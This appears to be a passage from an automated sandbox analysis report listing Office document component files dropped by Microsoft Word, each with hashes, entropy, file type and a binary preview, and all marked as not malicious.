                                                                                                                                                                                                                                                                SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                                                                                                                                SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                                                                                                                                SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9191
                                                                                                                                                                                                                                                                Entropy (8bit):7.93263830735235
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                                                                                                                                MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                                                                                                                                SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                                                                                                                                                SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                                                                                                                                SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4326
                                                                                                                                                                                                                                                                Entropy (8bit):7.821066198539098
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                                                                                                                                MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                                                                                                                                SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                                                                                                                                SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                                                                                                                                SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):7370
                                                                                                                                                                                                                                                                Entropy (8bit):7.9204386289679745
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                                                                                                                                MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                                                                                                                                SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                                                                                                                                SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                                                                                                                                SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5596
                                                                                                                                                                                                                                                                Entropy (8bit):7.875182123405584
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                                                                                                                                                MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                                                                                                                                                SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                                                                                                                                                SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                                                                                                                                                SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3683
                                                                                                                                                                                                                                                                Entropy (8bit):7.772039166640107
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                                                                                                                                                MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                                                                                                                                                SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                                                                                                                                                SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                                                                                                                                                SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4888
                                                                                                                                                                                                                                                                Entropy (8bit):7.8636569313247335
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                                                                                                                                MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                                                                                                                                SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                                                                                                                                SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                                                                                                                                SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6448
                                                                                                                                                                                                                                                                Entropy (8bit):7.897260397307811
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                                                                                                                                                MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                                                                                                                                                SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                                                                                                                                                SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                                                                                                                                                SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5630
                                                                                                                                                                                                                                                                Entropy (8bit):7.87271654296772
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                                                                                                                                MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                                                                                                                                SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                                                                                                                                SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                                                                                                                                SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6193
                                                                                                                                                                                                                                                                Entropy (8bit):7.855499268199703
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                                                                                                                                MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                                                                                                                                SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                                                                                                                                SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                                                                                                                                SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3075
                                                                                                                                                                                                                                                                Entropy (8bit):7.716021191059687
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                                                                                                                                MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                                                                                                                                SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                                                                                                                                SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                                                                                                                                SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5151
                                                                                                                                                                                                                                                                Entropy (8bit):7.859615916913808
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                                                                                                                                MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                                                                                                                                SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                                                                                                                                SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                                                                                                                                SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):333258
                                                                                                                                                                                                                                                                Entropy (8bit):4.654450340871081
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                                                                                                                                                MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                                                                                                                                                SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                                                                                                                                                SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                                                                                                                                                SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                                                                                                                                                Malicious:false
